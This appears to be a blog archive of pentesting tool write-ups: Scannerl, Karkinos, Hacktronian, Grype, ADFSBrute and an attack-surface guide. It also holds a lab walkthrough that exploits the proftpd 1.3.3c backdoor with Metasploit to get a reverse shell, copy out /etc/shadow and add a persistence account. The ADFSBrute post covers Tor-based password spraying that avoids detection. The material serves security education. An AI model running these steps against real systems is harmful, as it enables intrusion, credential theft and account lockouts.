Pentesting Archives - Tech Chronicles

Modular Distributed Fingerprinting Engine – Scannerl

Majordomo — Fri, 25 Jul 2025 20:53:06 +0000

Introduction

Scannerl is a modular, distributed fingerprinting engine implemented in Erlang. It can scan very large number of targets on a single host, but also can be distributed across multiple hosts. This tool is tested on Linux (Ubuntu, Debian, Arch & Kali Linux), but should work on other Linux distros, too.

Fingerprinting implies analyzing networks for vulnerabilities. The purpose is to accumulate as much information as possible, including the target’s OS, database version, configurations, architecture, etc. Therefore, attacker can identify OS information (version, nodes, etc) that run on specific target and find which vulnerabilities to exploit.
The remote fingerprinting can be classified in two categories: active and passive. In active fingerprinting we can send specifically created packets to the target machine and monitor the response. In passive fingerprinting we can sniff TCP/IP ports and monitor traffic between machine and nodes. Passive fingerprinting is less accurate than active fingerprinting, but pentesters and hackers often opt for this technique when they want to avoid detection.

Scannerl: Modular Distributed Fingerprinting Engine

Scannerl is an open source distributed fingerprinting tool developed by Kudelski Security. There are other fingerprinting tools, but those tools come with different limitations/problems such as: scanning on a few hosts at the time (not suitable for large IP addresses ranges); higher probability of being blacklisted, if large IP addresses range is protected by IPS devices (incomplete information). Scannerl successfully fights these limitations, therefore you can fingerprint multiple hosts simultaneously.

What is ZMap to port scanning, Scannerl is to fingerprinting. So, if you are planning large-scale fingerprinting sessions, this tool is the right choice. You can use it on a single host, but you can also easily distribute work over several machines.

Features:

Fast: With Scannerl you can spread the tasks across multiple hosts and increase the overall performance. Other fingerprinting tools are limited by the available resources of the host they run on (network card, CPU, RAM, network bandwidth, etc.). Cluster of virtual servers will be enough to perform large-scale scans, there is no need for high-end server.
Distributed: Master/Slave architecture enables workload across different hosts. Process is easy and transparent, you’ll only need to provide the hosts to use.
Scalable: Thanks to Erlang’s small sized processes, the tool can execute a large number of tasks in parallel, on the same host. Since Scannerl has ability to distribute the work across different hosts, we can say that it’s high-functioning and easily scalable tool.
Modular: You can easily add custom modules in order to fingerprint specific protocols and services in a few lines of code. In addition, it’s possible to add output modules to insert any results directly into a database technology of your choice.
Stealth: Reduced chance of being blocked. When using a single host to fingerprint a large number of IPs, there are high possabilites that ISPs/Firewalls might block your probes. But with Scannerl you can distribute your scan among several IP addresses and reduce the chance to be blocked.
Smart: Scannerl can retrieve specific information from a fingerprint session (a field in the header, the version, etc.).

Requirements:

Erlang v18+

Modules

This fingerprinting tool is very modular, therefore it’s easy to add new modules at compile time or dynamically (external file). Available modules:

Fingerprinting modules

bacnet: Bacnet identification
chargen: Chargen amplification factor identification
fox: FOX identification
httpbg: HTTP Server header identification
httpsbg: HTTPS Server header identification
https_certif: HTTPS certificate graber
imap_certif: IMAP STARTTLS certificate graber
modbus: Modbus identification
mqtt: MQTT identification
mqtts: MQTT over SSL identification
mysql_greeting: Mysql version identification
pop3_certif: POP3 STARTTLS certificate graber
smtp_certif: SMTP STARTTLS certificate graber
ssh_host_key: SSH host key graber

Output modules

csv: output to csv
csvfile: output to csv file
file: output to file
file_ip: output to stdout (only IP)
file_mini: output to file (only IP and result)
file_resultonly: output to file (only result)
stdout: output to stdout
stdout_ip: output to stdout (only IP)
stdout_mini: output to stdout (only IP and result)

Install

To build from source and to use Scannerl, first you need to install Erlang/OTP:

Debian

$ sudo apt install erlang erlang-src rebar

Arch

$ sudo pacman -S erlang-nox rebar

Then clone Scannerl from the github repo, and build:

$ git clone https://github.com/kudelskisecurity/scannerl.git
$ cd scannerl
$ ./build.sh

Kali

First install dependencies:

$ sudo apt install libssl-dev automake autoconf libncurses5-dev

Then install rebar (Erlang build tool for compiling and testing Erlang applications):

$ cd /tmp
$ git clone git://github.com/rebar/rebar.git; cd rebar
$ ./bootstrap
$ sudo cp rebar /usr/local/bin/rebar

Install kerl and Erlang/OTP 20.1

$ cd /tmp
$ curl -O https://raw.githubusercontent.com/kerl/kerl/master/kerl
$ chmod +x kerl
$ sudo cp kerl /usr/local/bin/kerl
$ kerl build 20.1 20.1
$ sudo mkdir /opt/kerl; sudo chown -R $USER /opt/kerl
$ kerl install 20.1 /opt/kerl/20.1

Then you’ll be able to build Scannerl:

$ source /opt/kerl/20.1/activate
$ git clone https://github.com/kudelskisecurity/scannerl.git
$ cd scannerl
$ ./build.sh

Basic Usage

$ ./scannerl -h
   ____   ____    _    _   _ _   _ _____ ____  _
  / ___| / ___|  / \  | \ | | \ | | ____|  _ \| |
  \___ \| |     / _ \ |  \| |  \| |  _| | |_) | |
   ___) | |___ / ___ \| |\  | |\  | |___|  _ <| |___
  |____/ \____/_/   \_\_| \_|_| \_|_____|_| \_\_____|

USAGE
  scannerl MODULE TARGETS [NODES] [OPTIONS]

  MODULE:
    -m  --module 
      mod: the fingerprinting module to use.
           arguments are separated with a colon.

  TARGETS:
    -f  --target 
      target: a list of target separated by a comma.
    -F  --target-file 
      path: the path of the file containing one target per line.
    -d  --domain 
      domain: a list of domains separated by a comma.
    -D  --domain-file 
      path: the path of the file containing one domain per line.

  NODES:
    -s  --slave 
      node: a list of node (hostnames not IPs) separated by a comma.
    -S  --slave-file 
      path: the path of the file containing one node per line.
            a node can also be supplied with a multiplier (*).

  OPTIONS:
    -o  --output      comma separated list of output module(s) to use.
    -p  --port      the port to fingerprint.
    -t  --timeout     the fingerprinting process timeout.
    -T  --stimeout    slave connection timeout (default: 10).
    -j  --max-pkt       max pkt to receive (int or "infinity").
    -r  --retry         retry counter (default: 0).
    -c  --prefix    sub-divide range with prefix > cidr (default: 24).
    -M  --message   port to listen for message (default: 57005).
    -P  --process       max simultaneous process per node (default: 28232).
    -Q  --queue         max nb unprocessed results in queue (default: infinity).
    -C  --config    read arguments from file, one per line.
    -O  --outmode   0: on Master, 1: on slave, >1: on broker (default: 0).
    -v  --verbose     be verbose (0 <= int <= 255).
    -K  --socket      comma separated socket option (key[:value]).
    -l --list-modules           list available fp/out modules.
    -V --list-debug             list available debug options.
    -A --print-args             Output the args record.
    -X --priv-ports             use only source port between 1 and 1024.
    -N --nosafe                 keep going even if some slaves fail to start.
    -w --www                    DNS will try for www..
    -b --progress               show progress.
    -x --dryrun                 dry run.

Distributed scan [setup & usage]

In order to perform distributed scan, you’ll need:

Master node: to run Scannerl’s binary (needs installed Scannerl)
Slave node(s): to connect Scannerl (need installed Erlang)

Requirements – all hosts:

have the same version of Erlang installed
are able to connect to each other using SSH public key
names resolve (use /etc/hosts if no proper DNS is setup)
have the same Erlang security cookie
must allow connection to Erlang EPMD port (TCP/4369)
have the following range of ports opened: TCP/11100 to TCP/11100 + number-of-slaves

To use, provide a list of slaves – example ( -s or -S switches):

$ ./scannerl -m httpbg -d example.com -s host1,host2,host3

To list all available modules, type -l:

$ ./scannerl -l

Standalone usage

You can use Scannerl on the local host without any other host, but the slave will be created anyway. So, you’ll need to fulfill same requirements described above. Make sure your host is able to resolve itself with the following:

$ grep -q "127.0.1.1\s*`hostname`" /etc/hosts || echo "127.0.1.1 `hostname`" | sudo tee -a /etc/hosts

Then create SSH key and add it to the authorized_keys. It’s assumed that you have SSH server running:

$ cat $HOME/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys

Standalone scan example:

$ ./scannerl -m httpbg -d example.com

Documentation
Download

The post Modular Distributed Fingerprinting Engine – Scannerl appeared first on Tech Chronicles.

Nmap Analysis Tool – Enhancing Network Security Through Advanced Analysis And Reporting

Majordomo — Sat, 02 Mar 2024 23:20:51 +0000

This CLI python script is designed to be used by security consultants, IT admins and network engineers to do two things, compare two Nmap XML files to create a spreadsheet that compares IPs, ports and services between the files, and create a markdown report using GPT.

Screenshots

Features

Comprehensive Nmap XML Parsing

Multiple File Support: Parse and analyze two Nmap XML output files.
Structured Data: Converts Nmap’s XML output into a structured format for further processing.

Comparative Analysis

Change Detection: Compare results from two Nmap scans to identify new, altered, or removed services and ports. Useful for when you scan the same IPs from different source IPs or over time.
Excel Reporting: Automatically generates detailed Excel spreadsheets with the comparison results and some stats.

Statistical Overview And Visualization

Network Exposure Statistics: Offers statistical analysis on detected services and open ports.
Excel Visualizations: Includes pie charts in Excel reports for a graphical representation of the network’s security posture.

AI-Powered Insights With GPT

GPT Report Generation: Uses OpenAI’s GPT to generate insightful analysis reports based on Nmap result stats. The tool uses a hardcoded prompt that sets the tone and requirements, then the script inserts the stats (no identifying information is provided) and if -c –context has been provided, it’ll add the context to the bottom of the prompt.
Customizable Context: Enhance GPT analysis by providing additional context, tailoring the report to specific needs.

Usage

The script prints the help page if no args are passed, or you can access with python nmap-analysis.py -h

Comparing Nmap Scans:

python nmap-analysis.py compare -ff (--first-nmap-file) path/to/first.xml -lf (--last-nmap-file) path/to/second.xml

Generating a GPT Report:

python nmap-analysis.py gpt-report -gf (--gpt-nmap-file) path/to/nmap.xml -c (--context) "Your optional context here"

Installation and Setup

Prerequisites

3.10+ probably (created using 3.12)
An OpenAI API key for GPT report generation that is set in local env

Secure Installation with `venv`

Clone the Repository:

git clone https://github.com/FlyingPhish/Nmap-Analysis
cd nmap-analysis-tool

2. Create a Virtual Environment:

python3 -m venv venv

Activate the Virtual Environment:

On Windows:

.\venv\Scripts\activate

The post Nmap Analysis Tool – Enhancing Network Security Through Advanced Analysis And Reporting appeared first on Tech Chronicles.

Exploiting the proftpd Linux Server

Majordomo — Mon, 24 Jul 2023 22:21:29 +0000

Computer systems get attacked daily. Ransomware, malware, stolen credentials, video game makers’ source code gets leaked, and money drained from users’ accounts dominate our news feeds. But how do hackers gain initial access to compromise a system? Let’s take a look at how a breach could happen.

Don’t get too excited. This Behind the Scenes (BTS) walkthrough is using an old, patched, well-documented vulnerability that was fixed shortly after it was discovered, but it serves as a great example showing how Linux servers are exploited if you don’t keep them patched and up-to-date.

We’ll go through the steps threat actors use to infiltrate a system:

Reconnaissance
Scanning
Obtaining Access
Exfilitrating data
Maintaining Persistence
Pivoting

Lab Environment

The local home lab provides everything we need for this walkthrough.

Vulnerable Linux Machine – Ubuntu 16.04
- proftpd 1.3.3c
- Apache HTTP
- OpenSSH
Attacking Machine – Ubuntu Server 22.04
- Nmap
- Metasploit

These tools are widely used by penetration testers, network administrators, and threat actors alike. The first tool is Nmap, short for Network Mapper. For network admins, Nmap helps to find networked computers, discover open ports, available services, and detect known vulnerabilities on their network. Once a list of services is discovered, they can be exploited.

Scanning with Nmap

This is part of the reconnaissance or scanning phase where the threat actor wants to learn as much about the target system as they can. Because this is a demonstration we are not going to be quiet about our attack and will do nothing to conceal our intentions. We will use -sV option that tells us the current version of any services that are running. This is a noisy attack that should be picked up by most intrusion detection systems or SIEMs.

$ nmap -sV 10.10.10.172

” alt=”” aria-hidden=”true” />

The results from this command reveal a lot about our target system. Each open port is vulnerable to a potential attack. In our simulated attack, we are going to concentrate on the ftp service running the proftpd 1.3.3c software on Port 21.

Port	Protocol	State	Service	Version
21	tcp	open	ftp	proftpd 1.3.3c
22	tcp	open	ssh	OpenSSH 7.2p2
80	tcp	open	http	Apache 2.4.18

The proftpd 1.3.3c software was patched over 10 years ago but serves as a good example of how a vulnerable piece of software can be exploited. It is highly unlikely to still be running as an unpatched service.

Researching Vulnerabilities

We could use Google to learn more about the vulnerabilities in the proftpd 1.3.3c server, or we can use the next tool in our toolbox, Metasploit, and use its built-in database to find known vulnerabilities.

Metasploit is an open-source penetration testing framework that helps network administrators, and security professionals discover vulnerabilities in their systems before exploitation by hackers. Complete with various tools, libraries, user interfaces, and modules, Metasploit allows a user to research, configure a payload, point it at a target, and launch an attack. Metasploit’s extensive database contains hundreds of exploits and payloads. Unfortunately, Metasploit is also widely used by threat actors.

Launching Metasploit

Find installation instructions for Metasploit in the documentation and start the Metasploit framework as root with the following command.

$ sudo msfconsole

” alt=”” aria-hidden=”true” />

Search the Database for Known Exploits

Metasploit comes with an extensive database and technical details of over 180,000 vulnerabilites and 4000 exploits. These are all searchable with the search command from the Metasploit command line. We are going to use this database to find proftpd 1.3.3c vulnerabilities and known exploits.

msf6> search proftpd 1.3.3c

” alt=”” aria-hidden=”true” />

The results of the search command reveal that there is a backdoor command execution exploit. This is what we are going to use to gain access to the Linux server.

Gaining System Access

Let’s begin initial access to the server by configuring our attack by typing use exploit/unix/ftp/proftpd_133c_backdoor or simply the module ID number, use 0.

msf6 > use exploit/unix/ftp/proftpd_133c_backdoor

” alt=”” aria-hidden=”true” />

Use the show payloads command to display the payloads available for the proftpd_133c_backdoor module.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show payloads

” alt=”” aria-hidden=”true” />

From the available payloads for the proftpd_133c_backdoor exploit, we are interested in Option 5, the payload/cmd/unix/reverse_perl command. Set the option using the payload number or the full command as follows:

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set PAYLOAD cmd/unix/reverse_perl

” alt=”” aria-hidden=”true” />

Now we need to make some site-specific configuration settings. The first is the IP address of the target machine. Set the remote host IP address with the RHOSTS command. This is the same IP address we used during our Nmap scan earlier and the machine that is running the proftpd_1.3.3c server.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 10.10.10.172

” alt=”” aria-hidden=”true” />

The local IP address is the computer that we are using for this attack. In our case, the LHOST is 10.10.10.171.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 10.10.10.171

” alt=”” aria-hidden=”true” />

The Metasploit configuration is complete. Run the exploit with the exploit command.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

” alt=”” aria-hidden=”true” />

This exploit takes a few seconds to run. When you see ‘Command shell session 1 opened’ you can issue Linux commands by typing a command name. In our example, entering the whoami command displays the current user, which is root. This is a big deal! Root is the superuser account in UNIX, has administrative purposes, and typically has the highest access rights on the system.

” alt=”” aria-hidden=”true” />

At this point, the system is compromised and you can do whatever you want.

Gaining a Shell

To have any real fun on our compromised system we are going to want a full Linux shell. The following python command spawns a bash shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

” alt=”” aria-hidden=”true” />

Once we have a proper shell we can move through the system as root, having full access to the Linux environment. This is where the system is most vulnerable. As root we can install rootkits, malware, ransomware, and exfiltrate data.

Data Exfiltration

Data exfiltration is when a threat actor performs the unauthorized copying, transfer, or retrieval of data from a computer or server. As root, we have full access to the computer and can do anything we want including data exfiltration.

The Linux /etc/password file contains a list of system users, combined with the /etc/shadow file which contains encrypted passwords. Together these two files can be hacked to reveal username/password combinations for lateral movement through the network.

Again, we don’t really care about protecting our identity or our intentions (a SIEM would flag this immediately) so we are going to use scp (secure copy) to copy the password and shadow files to our remote server.

” alt=”” aria-hidden=”true” />

And /etc/shadow

” alt=”” aria-hidden=”true” />

We exfiltrated /etc/passwd and /etc/shadow to our local machine. There is no reason that we could not also exfiltrate databases, customer information, stored credit cards, or company-sensitive information out of the network to a remote location as we did with the password files.

Usernames and Passwords

Cracking the hashed passwords is beyond the scope of this walkthrough, but if you can crack the passwords, an attacker can use the same credentials to pivot to other machines across the network. John the Ripper and Hashcat are two well-known password cracking tools that can quickly reveal username/password combinations.

Maintaining Persistence

Persistence in cybersecurity occurs when a threat actor discreetly maintains long-term access to systems despite disruptions such as restarts or changed credentials. As root user, we can perform any administrative task we want, including adding users. One of the ways to maintain persistence is by adding a new user so the threat actor can gain access at a later time. Let’s add a new user.

root@vtsec:/# adduser badguy

” alt=”” aria-hidden=”true” />

And give them superuser access.

root@vtsec:/# usermod -aG sudo badguy

” alt=”” aria-hidden=”true” />

In the Sophos Active Adversary Playbook for 2021, “The median time that attackers were able to remain in the target network before detection – dwell time – was 11 days. This provides attackers with approximately 264 hours for malicious activity, such as lateral movement, reconnaissance, credential dumping, data exfiltration, and more.” Becoming a user of the system is one of the ways they can maintain persistence during this dwell time.

How to Protect Your Network

This type of attack would be caught by Antivirus (AV), Data Loss Prevention (DLP), and other SIEM solutions to control intrusions and data exfiltration. These are all basic cyber security tools that are part of a company’s overall security strategy that focuses on detecting and preventing the loss, leakage, or misuse of data through breaches, exfiltration, and unauthorized use.

Although it’s unlikely to find the proftpd 1.3.3c vulnerability because it was patched a long time ago, protecting your servers from this type of attack is the first step to protecting them. Update your software and perform routine patch management for all of your services.

The post Exploiting the proftpd Linux Server appeared first on Tech Chronicles.

Karkinos – Penetration Testing and Hacking CTF’s Swiss Army Knife

Majordomo — Mon, 23 Jan 2023 19:31:24 +0000

What is Karkinos?

Karkinos is a light-weight ‘Swiss Army Knife’ for penetration testing and/or hacking CTF’s. Currently, Karkinos offers the following:

Encoding/Decoding characters
Encrypting/Decrypting text or files
3 Modules
Cracking and generating hashes

Disclaimer

This tool should be used on applications/networks that you have permission to attack only. Any misuse or damage caused will be solely the users’ responsibility.

More: https://github.com/helich0pper/Karkinos

Dependencies

Any server capable of hosting PHP; tested with Apache Server
Tested with PHP 7.4.9
Tested with Python 3.8
Make sure it is in your path as:
Windows: python
Linux: python3
If it is not, please change the commands in includes/pid.php
pip3
Raspberry Pi Zero friendly (crack hashes at your own risk)

Installing

This installation guide assumes you have all the dependencies. A Wiki page with troubleshooting steps can be found here.

Linux/BSD

git clone https://github.com/helich0pper/Karkinos.git
cd Karkinos
pip3 install -r requirements.txt
cd wordlists && unzip passlist.zip You can also unzip it manually using file explorer. Just make sure passlist.txt is in wordlists directory.
Make sure you have write privileges for db/main.db
Enable extension=mysqli in your php.ini file.
If you don’t know where to find this, refer to the PHP docs. Note: MySQLi is only used to store statistics.
Thats it! Now just host it using your preferred web server or run: php -S 127.0.0.1:8888 in the Karkinos directory.Important: using port 5555, 5556, or 5557 will conflict with the Modules
If you insist on using these ports, change the PORT value in:

- /bin/Server/app.py Line 87
- /bin/Busting/app.py Line 155
- /bin/PortScan/app.py Line 128

Windows

git clone https://github.com/helich0pper/Karkinos.git
cd Karkinos
pip3 install -r requirements.txt
cd wordlists && unzip passlist.zip
You can also unzip it manually using file explorer. Just make sure passlist.txt is in wordlists directory.
Make sure you have write privileges for db/main.db
Enable extension=mysqli.dll in your php.ini file.
If you don’t know where to find this, refer to the PHP docs. Note: MySQLi is only used to store statistics
Thats it! Now just host it using your preferred web server or run: php -S 127.0.0.1:8888 in the Karkinos directory.Important: using port 5555, 5556, or 5557 will conflict with the Modules
If you insist on using these ports, change the PORT value in:

/bin/Server/app.py Line 87
/bin/Busting/app.py Line 155
/bin/PortScan/app.py Line 128

Home Menu

Landing page and quick access menu.

User stats are displayed here. Currently, the stats recorded are only the total hashes and hash types cracked successfully.

Encoding/Decoding

This page allows you to encode/decode in common formats (more may be added soon)

Encrypt/Decrypt

Encrypting and decrypting text or files is made easy and is fully trusted since it is done locally.

Reverse Shell Handling

Reverse shells can be captured and interacted with on this page.

Create a listener instance

Configure the listener

Start the listener and capture a shell

Full reverse shell handling demo:

Directory and File Busting

Create an instance

Configure it

Start scanning

Full Directory and File Busting demo:

Port Scanning

Launch the scanner

Configure it

Start scanning

Full Port Scanning Demo:

Generating Hashes

Karkinos can generate commonly used hashes such as:

MD5
SHA1
SHA256
SHA512

Cracking Hashes

Karkinos offers the option to simultaneously crack hashes using a built-in wordlist consisting of over 15 million common and breached passwords. This list can easily be modified and/or completely replaced.

The post Karkinos – Penetration Testing and Hacking CTF’s Swiss Army Knife appeared first on Tech Chronicles.

Hacktronian: All in One Hacking Tool for Linux

Majordomo — Sun, 22 Aug 2021 19:05:06 +0000

Hacktronian is an all in one hacking suite for Linux and Android. It contains tools for different phases from information gathering to post exploitation. This makes it a handy tool for any penetration tester.

Hackronian contains a diverse range of tools which allow the user to gain information, attack targets, perform sniffing and snooping on targets and perform post exploitation operations on the target. This main benefit of this suite is that all these different tools are available in one place and the user can experiment with different tools within the same terminal. The secondary benefit of this tool is that it can be installed on Android with all the same features.

Features:

Contains more than 50 different tools
Modules range from information gathering to post exploitation
Available for both Android and Linux
Perfect for creating a penetration testing workflow

HACKTRONIAN Menu :

Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKTRONIAN

Information Gathering:

Nmap
Setoolkit
Port Scanning
Host To IP
wordpress user
CMS scanner
XSStrike
Dork – Google Dorks Passive Vulnerability Auditor
Scan A server’s Users
Crips

Password Attacks:

Cupp
Ncrack

Wireless Testing:

reaver
pixiewps
Fluxion

Exploitation Tools:

ATSCAN
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn

Sniffing & Spoofing:

Setoolkit
SSLtrip
pyPISHER
SMTP Mailer

Web Hacking:

Drupal Hacking
Inurlbr
WordPress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
WordPress Exploit Scanner
WordPress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 – 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX – Automatically brute force all services running on a target
Arachni – Web Application Security Scanner Framework

Private Web Hacking:

Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
ports Scan (common ports)
Get server Info
Bypass Cloudflare

Post Exploitation:

Shell Checker
POET
Weeman

Supported Platforms:

Linux
Android (Termux)

Installation in Linux :

This Tool Must Run As ROOT !!!

git clone https://github.com/thehackingsage/hacktronian.git

cd hacktronian

chmod +x install.sh

./install.sh

That’s it.. you can execute tool by typing hacktronian

Installation in Android :

Open Termux

pkg install git

pkg install python

git clone https://github.com/thehackingsage/hacktronian.git

cd hacktronian

chmod +x hacktronian.py

python2 hacktronian.py

Video Tutorial :

YouTube : https://www.youtube.com/watch?v=1LJlyQAQby4

Hacktronian Usage

To execute Hacktronian, run:

$ hacktronian

 _   _    _    ____ _  _______ ____   ___  _   _ ___    _    _   _ 
| | | |  / \  / ___| |/ /_   _|  _ \ / _ \| \ | |_ _|  / \  | \ | |
| |_| | / _ \| |   | ' /  | | | |_) | | | |  \| || |  / _ \ |  \| |
|  _  |/ ___ \ |___| . \  | | |  _ <| |_| | |\  || | / ___ \| |\  |
|_| |_/_/   \_\____|_|\_\ |_| |_| \_\_ __/|_| \_|___/_/   \_\_| \_|
 
[!] This Tool Must Run As ROOT [!] https://linktr.ee/thehackingsage
 
   {1}--Information Gathering
   {2}--Password Attacks
   {3}--Wireless Testing
   {4}--Exploitation Tools
   {5}--Sniffing & Spoofing
   {6}--Web Hacking
   {7}--Private Web Hacking
   {8}--Post Exploitation
   {0}--Install The HACKTRONIAN
   {99}-Exit
 
hacktronian~#

Download: https://github.com/thehackingsage/hacktronian

The post Hacktronian: All in One Hacking Tool for Linux appeared first on Tech Chronicles.

Grype – Vulnerability Scanner For Container Images & Filesystems

Majordomo — Sat, 08 May 2021 23:48:31 +0000

Grype is a vulnerability scanner for container images and filesystems with an easy to install binary that supports the packages for most major *nix based operating systems.

Features of Grype Vulnerability Scanner For Container Images & Filesystems

Scan the contents of a container image or filesystem to find known vulnerabilities and find vulnerabilities for major operating system packages in:

Alpine
BusyBox
CentOS / Red Hat
Debian
Ubuntu

Find vulnerabilities for language-specific packages:

Ruby (Bundler)
Java (JARs, etc)
JavaScript (NPM/Yarn)
Python (Egg/Wheel)
Python pip/requirements.txt/setup.py listings

Grype Supports Docker and OCI image formats.

Using Grype Vulnerability Scanner For Container Images & Filesystems

To scan for vulnerabilities in an image:

grype

Grype can scan a variety of sources beyond those found in Docker.

# scan a container image archive (from the result of `docker image save ...`, `podman save ...`, or `skopeo copy` commands)

grype path/to/image.tar

# scan a directory

grype dir:path/to/dir

The output format for Grype is configurable as well:
grype <image> -o <format>

Where the formats available are:

json: Use this to get as much information out of Grype as possible!
cyclonedx: An XML report conforming to the CycloneDX 1.2 specification.
table: A columnar summary (default).

Getting started

Install the binary, and make sure that grype is available in your path. To scan for vulnerabilities in an image:

grype

The above command scans for vulnerabilities that are visible in the container (i.e., the squashed representation of the image). To include software from all image layers in the vulnerability scan, regardless of its presence in the final image, provide --scope all-layers:

grype  --scope all-layers

Grype can scan a variety of sources beyond those found in Docker.

# scan a container image archive (from the result of `docker image save ...`, `podman save ...`, or `skopeo copy` commands)
grype path/to/image.tar

# scan a directory
grype dir:path/to/dir

Grype’s Database

Grype pulls a database of vulnerabilities derived from the publicly available Anchore Feed Service. This database is updated at the beginning of each scan, but an update can also be triggered manually.

Shell Completion

Grype supplies shell completion through its CLI implementation (cobra). Generate the completion code for your shell by running one of the following commands:

grype completion
go run main.go completion

This will output a shell script to STDOUT, which can then be used as a completion script for Grype. Running one of the above commands with the -h or --help flags will provide instructions on how to do that for your chosen shell.

You can download Grype or read more here.

The post Grype – Vulnerability Scanner For Container Images & Filesystems appeared first on Tech Chronicles.

Offensive Security Tool: ADFSBrute

Majordomo — Sun, 25 Apr 2021 23:05:03 +0000

Offensive Security Tool: ADFSBrute

GitHub Link

adfsbrute

ADFSBrute by ricardojoserf, is a script to test credentials against Active Directory Federation Services (ADFS), calculating the ADFS url of an organization and allowing password spraying or bruteforce attacks.

The main idea is carrying out password spraying attacks with a random and high delay between each test and using a list of proxies or Tor to make the detection by the Blue Team more difficult. Brute force attacks are also possible, or testing credentials with the format username:password (for example from Pwndb). Tested logins will get stored in a log file to avoid testing them twice.

Usage

./adfsbrute.py -t TARGET [-u USER] [-U USER_LIST] [-p PASSWORD] [-P PASSWORD_LIST] [-UL userpassword_list]
[-m MIN_TIME] [-M MAX_TIME] [-tp TOR_PASSWORD] [-pl PROXY_LIST] [-n NUMBER_OF_REQUESTS_PER_IP]
[-s STOP_ON_SUCCESS] [-r RANDOM_COMBINATIONS] [-d DEBUG] [-l LOG_FILE]

The parameters for the attacks are:

* -t: Target domain. Example: test.com

* -u: Single username. Example: agarcia@domain.com

* -U: File with a list of usernames. Example: users.txt

* -p: Single password: Example: Company123

* -P: File with a list of passwords. Example: passwords.txt

* -UP: File with a list of credentials in the format "username:password". Example: userpass.txt

* -m : Minimum value of random seconds to wait between each test. Default: 30

* -M : Maximum value of random seconds to wait between each test. Default: 60

* -tp: Tor password (change IP addresses using Tor)

* -pl: Use a proxy list (change IP addresses using a list of proxy IPs)

* -n: Number of requests before changing IP address (used with -tp or -pl). Default: 1

* -s: Stop on success, when one correct credential is found. Default: False

* -r: Randomize the combination of users and passwords. Default: True

* -d: Show debug messages. Default: True

* -l: Log file location with already tested credentials. Default: tested.txt

Examples

Password spraying with password “Company123”, tor password is “test123” and changing the IP every 3 requests:

python3 adfsbrute.py -t company.com -U users.txt -p Company123 -tp test123 -n 3

Password spraying with password “Company123”, tor password is “test123”, changing the IP for every request, random delay time between 10 and 20 seconds and do not randomize the order of users:

python3 adfsbrute.py -t company.com -U users.txt -p Company123 -tp test123 -m 10 -M 20 -r False

Finding ADFS url:

python3 adfsbrute.py -t company.com

Using Tor

To use Tor to change the IP for every request, you must hash a password:

tor --hash-password test123

In the file /etc/tor/torrc, uncomment the variable ControlPort and the variable HashedControlPassword, and in this last one add the hash:

ControlPort 9051
HashedControlPassword 16:7F314CAB402A81F860B3EE449B743AEC0DED9F27FA41831737E2F08F87

Restart the tor service and use this password as argument for the script (“-tp test123” or “–tor_password 123”)

service tor restart

Note

This script is implemented to test in security audits, DO NOT use without proper authorization from the company owning the ADFS or you will block accounts.

The post Offensive Security Tool: ADFSBrute appeared first on Tech Chronicles.

The Attack Surface Mapping guide for Ethical Hackers

Majordomo — Thu, 22 Apr 2021 21:28:38 +0000

An attack surface aims to figure out which areas of a system must be examined and analyzed for security loopholes in order to mitigate the threat.

Mapping the system’s attack surface is a practice that enables you to think about most of your assets and their value. DNS Lookup, WHOIS Lookup, etc., techniques help to map the attack surface.

Let’s get going to have a proper understanding of Attack Surface Mapping.

What is an Attack Surface?

The Attack Surface is a term that defines all the various points where an intruder might gain access to a system and access information.

These flaws are usually associated with a system’s privacy issues. A simple security measure is to make the attack surface as minimal as practicable.

What About the Attack Surface Types?

There are two kinds of attack surfaces: the digital and the physical attack surface.

Since these dual attack surfaces intersect and are linked, it is critical to protect them together. Web services, networks, networking protocols, and domain names are all part of the digital attack surface. The physical attack surface refers to the external threats against an organization, such as building windows, manufacturing services, or a flame.

Visualize an Attack Surface

As per Skybox Security’s white paper, there are three measures to grasp and visualize an attack surface.

To envision a company’s infrastructure by mapping out all the systems, routes, and channels.
To compare each indication of a weakness that reveals to its last step’s visualized chart.
Look for compromise measures. It is a sign that a threat is already accomplishing.

How Can You Assess Your Attack Surface?

Identifying your information system’s attack surface is a challenge that allows you to consider most of your resources and the importance they have. To build a global map, you will need to do the following:

List down
- DNS records, sub-domains, etc.
- External and known servers like FTP, SSH, etc.
- Different software as well as their variants.
Take account of physical access to the corporation’s properties (structures, system robbery, manufacturing facility, etc.).
Look for more networks and servers to exploit after identifying all hosts of an organization.
Consider a standard web server; the open ports themselves (HTTP, RDP, etc.) are all sources of threat. It is crucial to map out the virtual clients operating on the server; web apps running on any of them are also an attack vector.
Most domains have a DNS server, SMTP server, etc. While evaluating the attack surface, these would be the first reference point. Using DNS lookup and WHOIS, map out where the A records, MX records, and DNS records services get housed.

Examples

DNS Lookup

To locate the IP address of a specific domain name, use a DNS lookup method. The IP addresses in the DNS records obtained from name servers include in the outcome. Two categories to DNS lookups:

Forward DNS lookup.

The Forward DNS lookup or basic DNS lookup is a widely use DNS method. Discovering a domain’s IP address is the forward method to DNS.

Reverse DNS lookup.

The procedure is similar in a reverse DNS lookup, only that it begins via an IP address and ends with the domain name.

IP Netblocks

IP netblocks are sets of IP addresses that belong to a specific server. Regional Internet Registry (RIRs) allocate IP blocks to netblock users who are usually ISPs and big firms with many IP addresses.

WHOIS Lookup

Whois is a popular Internet database. It outlines who possesses a domain name, IP address, etc. Whois databases are valuable and have become an indispensable tool for ensuring the legality of the domain name registry and website management procedures. A Whois database includes all the contact details for the user, community, or organization that owns a domain name.

Mitigate Attack Surface?

